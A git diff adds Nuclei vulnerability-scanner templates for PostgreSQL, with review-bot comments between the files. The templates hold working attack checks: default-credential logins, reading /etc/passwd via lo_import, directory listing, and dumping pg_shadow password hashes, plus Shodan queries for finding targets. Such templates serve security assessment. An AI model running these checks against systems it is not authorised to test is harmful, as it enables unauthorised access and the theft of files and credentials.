diff --git a/javascript/enumeration/pgsql/pgsql-default-db.yaml b/javascript/enumeration/pgsql/pgsql-default-db.yaml
new file mode 100644
index 0000000000..e8f3e07731
--- /dev/null
+++ b/javascript/enumeration/pgsql/pgsql-default-db.yaml
@@ -0,0 +1,49 @@
+id: pgsql-default-db
+
+info:
+ name: Postgresql Default Database - Enumeration
+ author: pussycat0x
+ severity: high
+ description: |
+ Postgresql has a flaw that allows the attacker to login with empty password.
+ reference:
+ - https://www.tenable.com/plugins/nessus/104031
+ metadata:
+ shodan-query: product:"PostgreSQL"
+ tags: js,network,postgresql
+
+javascript:
+ - code: |
+ const postgres = require('nuclei/postgres');
+ const client = new postgres.PGClient;
+ connected = client.ConnectWithDB(Host, Port, User, Pass, Db);
+ connected ;
+
+ args:
+ Host: "{{Host}}"
+ Port: 5432
+ User: "{{usernames}}"
+ Pass: "{{password}}"
+ Db: "{{database}}"
+
+ payloads:
+ usernames:
+ - postgres
+ - meow
+ database:
+ - foresight
+ - postgres
+ - template0
+ - template1
+ - test
+ password:
+ - postgres
+ -
+ attack: clusterbomb
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "success == true"
+ - "response == true"
+ condition: and
\ No newline at end of file
diff --git a/javascript/enumeration/pgsql/pgsql-exp.yaml b/javascript/enumeration/pgsql/pgsql-exp.yaml
new file mode 100644
index 0000000000..3c1dd8ba11
--- /dev/null
+++ b/javascript/enumeration/pgsql/pgsql-exp.yaml
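Review bot: `connected = client.ConnectWithDB(Host, Port, User, Pass, Db);` in the code block assigns to an identifier that is never declared, creating an implicit global; write it as `const connected = client.ConnectWithDB(Host, Port, User, Pass, Db);` and drop the stray space in `connected ;`, the way postgresql-empty-password.yaml in this same commit declares it. The same undeclared `connected` appears in pgsql-exp.yaml, pgsql-file-read.yaml, pgsql-list-database.yaml, pgsql-list-password-hashes.yaml, pgsql-list-users.yaml and pgsql-version-detect.yaml. The description `Postgresql has a flaw that allows the attacker to login with empty password.` is copied from the empty-password template and does not describe this one, which tries the listed usernames and passwords against the listed databases; pgsql-list-users.yaml and pgsql-version-detect.yaml carry the same copied description and need their own wording too. The last `password` payload is a bare `-`, which YAML loads as null rather than the empty string, so if an empty password is the intended case write it as `- ""` to make the argument unambiguous.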
@@ -0,0 +1,63 @@
+id: postgresql-exprement
+
+info:
+ name: PGSQL -EXP
+ author: pussycat0x
+ severity: info
+ description: |
+ Read and list the files within the PostgreSQL database,
+ reference:
+ - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-file-read
+ metadata:
+ shodan-query: product:"PostgreSQL"
+ tags: js,network,postgresql
+
+javascript:
+ - code: |
+ const postgres = require('nuclei/postgres');
+ const client = new postgres.PGClient;
+ const flread = "SELECT lo_import('/etc/passwd');"
+ for (let i=0; i < 1; i++){
+ connected = client.ExecuteQuery(Host, Port, User, Pass, Db, flread);
+ const final = to_json(connected)
+ const parsedData = JSON.parse(final);
+ const loImportValue = parsedData.Rows[0].lo_import;
+ const valtw = "SELECT lo_get(" + loImportValue +");"
+ const qry = [valtw, "SELECT * from pg_largeobject;"];
+ for (const x of qry){
+ connected = client.ExecuteQuery(Host, Port, User, Pass, Db, x);
+ Export(connected);
+ }
+
+ }
+
+
+
+
+
+ args:
+ Host: "{{Host}}"
+ Port: 5432
+ User: "{{usernames}}"
+ Pass: "{{password}}"
+ Db: "{{database}}"
+
+ payloads:
+ usernames:
+ - postgres
+ database:
+ - postgres
+ password:
+ - postgres
+
+ attack: clusterbomb
+
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - "success == true"
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
\ No newline at end of file
diff --git a/javascript/enumeration/pgsql/pgsql-file-read.yaml b/javascript/enumeration/pgsql/pgsql-file-read.yaml
new file mode 100644
index 0000000000..09b8738884
--- /dev/null
+++ b/javascript/enumeration/pgsql/pgsql-file-read.yaml
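Review bot: `for (let i=0; i < 1; i++){` wraps the whole body in a loop that runs exactly once, so the loop and the unused `i` should be removed and the body un-nested, along with the five empty lines before `args:`. `parsedData.Rows[0].lo_import` is read without checking that the first query returned a row, so an empty result throws inside the template instead of producing a clean non-match; guard it with `if (!parsedData.Rows || parsedData.Rows.length === 0) { return; }` before `valtw` is built, and since `valtw` is SQL assembled from a server-returned value, check that `loImportValue` is an integer before interpolating it. The first query creates a large object inside the target database and no later query removes it, and `severity: info` sits oddly next to a `root:.*:0:0:` matcher that only fires when the contents of /etc/passwd come back; both the side effect on the target and the actual impact belong in `description`. The id `postgresql-exprement` and the name `PGSQL -EXP` read like placeholders, and the description text ends with a comma.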
@@ -0,0 +1,42 @@
+id: postgresql-file-read
+
+info:
+ name: PostgreSQL File Read
+ author: pussycat0x
+ severity: info
+ description: |
+ Read and list the files within the PostgreSQL database,
+ reference:
+ - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-file-read
+ metadata:
+ shodan-query: product:"PostgreSQL"
+ tags: js,network,postgresql
+
+javascript:
+ - code: |
+ const postgres = require('nuclei/postgres');
+ const client = new postgres.PGClient;
+ connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "select pg_ls_dir('./');");
+ Export(connected);
+
+ args:
+ Host: "{{Host}}"
+ Port: 5432
+ User: "{{usernames}}"
+ Pass: "{{password}}"
+ Db: "{{database}}"
+
+ payloads:
+ usernames:
+ - postgres
+ database:
+ - postgres
+ password:
+ - postgres
+
+ attack: clusterbomb
+
+ extractors:
+ - type: json
+ json:
+ - '.Rows[].pg_ls_dir'
\ No newline at end of file
diff --git a/javascript/enumeration/pgsql/pgsql-list-database.yaml b/javascript/enumeration/pgsql/pgsql-list-database.yaml
new file mode 100644
index 0000000000..6913a7d607
--- /dev/null
+++ b/javascript/enumeration/pgsql/pgsql-list-database.yaml
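Review bot: The description `Read and list the files within the PostgreSQL database,` is copied verbatim from pgsql-exp.yaml, ends in a comma, and does not say what this template does: its only query is `select pg_ls_dir('./');`, which lists the entries of a directory (`./`, presumably the server's data directory) rather than reading a file. A description such as `Lists the entries of the PostgreSQL server's working directory via pg_ls_dir.` would match the query and the `.Rows[].pg_ls_dir` extractor, and the name `PostgreSQL File Read` should be brought in line with it. If a file-read check is what is wanted, this query does not provide one.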
@@ -0,0 +1,42 @@
+id: postgresql-list-database
+
+info:
+ name: PostgreSQL List Database
+ author: pussycat0x
+ severity: info
+ description: |
+ PostgreSQL List Password Hashes
+ reference:
+ - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-password-hashes
+ - https://launchbylunch.com/posts/2024/Jan/16/postgres-password-encryption/#postgresql-password-encryption-scram-sha-256
+ metadata:
+ shodan-query: product:"PostgreSQL"
+ tags: js,network,postgresql
+
+javascript:
+ - code: |
+ const postgres = require('nuclei/postgres');
+ const client = new postgres.PGClient;
+ connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT datname FROM pg_database");
+ Export(connected);
+ args:
+ Host: "{{Host}}"
+ Port: 5432
+ User: "{{usernames}}"
+ Pass: "{{password}}"
+ Db: "{{database}}"
+
+ payloads:
+ usernames:
+ - postgres
+ database:
+ - postgres
+ password:
+ - postgres
+
+ attack: clusterbomb
+
+ extractors:
+ - type: json
+ json:
+ - '.Rows[].datname'
\ No newline at end of file
diff --git a/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml b/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml
new file mode 100644
index 0000000000..7f02d97ca8
--- /dev/null
+++ b/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml
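Review bot: The `info` block does not describe this template: the description text `PostgreSQL List Password Hashes` and both reference URLs are copied from pgsql-list-password-hashes.yaml, while the only query is `SELECT datname FROM pg_database` and the extractor is `.Rows[].datname`. Replace the description with something like `Lists the databases present on the PostgreSQL server via the pg_database catalog.` and point the references at material about `pg_database` rather than password hashing, so that the template's output is not mislabelled in reports.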
@@ -0,0 +1,42 @@
+id: pgsql-exec
+
+info:
+ name: PostgreSQL List Password Hashes
+ author: pussycat0x
+ severity: info
+ description: |
+ PostgreSQL List Password Hashes
+ reference:
+ - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-password-hashes
+ - https://launchbylunch.com/posts/2024/Jan/16/postgres-password-encryption/#postgresql-password-encryption-scram-sha-256
+ metadata:
+ shodan-query: product:"PostgreSQL"
+ tags: js,network,postgresql
+
+javascript:
+ - code: |
+ const postgres = require('nuclei/postgres');
+ const client = new postgres.PGClient;
+ connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT usename, passwd FROM pg_shadow");
+ Export(connected)
+ args:
+ Host: "{{Host}}"
+ Port: 5432
+ User: "{{usernames}}"
+ Pass: "{{password}}"
+ Db: "{{database}}"
+
+ payloads:
+ usernames:
+ - postgres
+ database:
+ - postgres
+ password:
+ - postgres
+
+ attack: clusterbomb
+
+ extractors:
+ - type: json
+ json:
+ - '.Rows[] | "\(.usename) : \(.passwd)"'
\ No newline at end of file
diff --git a/javascript/enumeration/pgsql/pgsql-list-users.yaml b/javascript/enumeration/pgsql/pgsql-list-users.yaml
new file mode 100644
index 0000000000..4691e912af
--- /dev/null
+++ b/javascript/enumeration/pgsql/pgsql-list-users.yaml
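Review bot: The id `pgsql-exec` matches neither the file name pgsql-list-password-hashes.yaml nor the name `PostgreSQL List Password Hashes`, and the id is what identifies the template in output, so use `id: pgsql-list-password-hashes`. The ids in this commit also mix the `pgsql-` and `postgresql-` prefixes (`postgresql-file-read`, `postgresql-list-database`, `pgsql-list-users`), which is worth settling on one form before these land. `Export(connected)` lacks the semicolon every sibling template uses. `severity: info` seems low for a template whose extractor emits `usename : passwd` pairs from `pg_shadow`, which is credential material; consider whether it should carry the `high` used by pgsql-default-db.yaml.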
@@ -0,0 +1,43 @@
+id: pgsql-list-users
+
+info:
+ name: PostgreSQL List Users
+ author: pussycat0x
+ severity: info
+ description: |
+ Postgresql has a flaw that allows the attacker to login with empty password.
+ reference:
+ - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-users
+ metadata:
+ shodan-query: product:"PostgreSQL"
+ tags: js,network,postgresql
+
+javascript:
+ - code: |
+ const postgres = require('nuclei/postgres');
+ const client = new postgres.PGClient;
+ connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT usename FROM pg_user");
+ Export(connected);
+
+ args:
+ Host: "{{Host}}"
+ Port: 5432
+ User: "{{usernames}}"
+ Pass: "{{password}}"
+ Db: "{{database}}"
+# Query: "\du"
+
+ payloads:
+ usernames:
+ - postgres
+ database:
+ - postgres
+ password:
+ - postgres
+
+ attack: clusterbomb
+
+ extractors:
+ - type: json
+ json:
+ - '.Rows[].usename'
\ No newline at end of file
diff --git a/javascript/enumeration/pgsql/pgsql-version-detect.yaml b/javascript/enumeration/pgsql/pgsql-version-detect.yaml
new file mode 100644
index 0000000000..b59271f752
--- /dev/null
+++ b/javascript/enumeration/pgsql/pgsql-version-detect.yaml
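Review bot: `# Query: "\du"` sits at column 0 between `Db: "{{database}}"` and `payloads:` and is a drafting leftover; it names a psql meta-command the template never runs, so delete it rather than ship commented-out intent (pgsql-version-detect.yaml carries the same stray line in the same place). If a pointer to the equivalent interactive command is wanted, it belongs in `description`, not as a bare comment inside the `args` block.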
@@ -0,0 +1,43 @@
+id: pgsql-version-detect
+
+info:
+ name: Postgresql Version - Detect
+ author: pussycat0x
+ severity: info
+ description: |
+ Postgresql has a flaw that allows the attacker to login with empty password.
+ reference:
+ - https://www.tenable.com/plugins/nessus/104031
+ metadata:
+ shodan-query: product:"PostgreSQL"
+ tags: js,network,postgresql
+
+javascript:
+ - code: |
+ const postgres = require('nuclei/postgres');
+ const client = new postgres.PGClient;
+ connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "select version();");
+ Export(connected);
+
+ args:
+ Host: "{{Host}}"
+ Port: 5432
+ User: "{{usernames}}"
+ Pass: "{{password}}"
+ Db: "{{database}}"
+# Query: "\du"
+
+ payloads:
+ usernames:
+ - postgres
+ database:
+ - postgres
+ password:
+ - postgres
+
+ attack: clusterbomb
+
+ extractors:
+ - type: json
+ json:
+ - '.Rows[0].version'
\ No newline at end of file
diff --git a/javascript/enumeration/pgsql/postgresql-empty-password.yaml b/javascript/enumeration/pgsql/postgresql-empty-password.yaml
new file mode 100644
index 0000000000..3dc010c7ad
--- /dev/null
+++ b/javascript/enumeration/pgsql/postgresql-empty-password.yaml
@@ -0,0 +1,33 @@
+id: postgresql-empty-password
+
+info:
+ name: Postgresql Empty Password - Detect
+ author: pussycat0x
+ severity: high
+ description: |
+ Postgresql has a flaw that allows the attacker to login with empty password.
+ reference:
+ - https://www.tenable.com/plugins/nessus/104031
+ metadata:
+ shodan-query: product:"PostgreSQL"
+ tags: js,network,postgresql
+
+javascript:
+ - code: |
+ const postgres = require('nuclei/postgres');
+ const client = new postgres.PGClient;
+ const connected = client.Connect(Host, Port, User, Pass);
+ connected;
+
+ args:
+ Host: "{{Host}}"
+ Port: 5432
+ User: "postgres"
+ Pass: "postgres"
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "success == true"
+ - "response == true"
+ condition: and
\ No newline at end of file
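Review bot: `Pass: "postgres"` in the args of postgresql-empty-password.yaml contradicts the id `postgresql-empty-password`, the name `Postgresql Empty Password - Detect` and the description, all of which describe a login with an empty password; as written the template checks the `postgres`/`postgres` pair, which pgsql-default-db.yaml in this commit already covers. Either make the password argument genuinely empty (`Pass: ""`) so the check matches its own documentation, or rename and re-describe the template as a default-credential check and drop the duplicate. The Nessus reference is presumably about the empty-password condition, so it should stay with whichever template actually tests it.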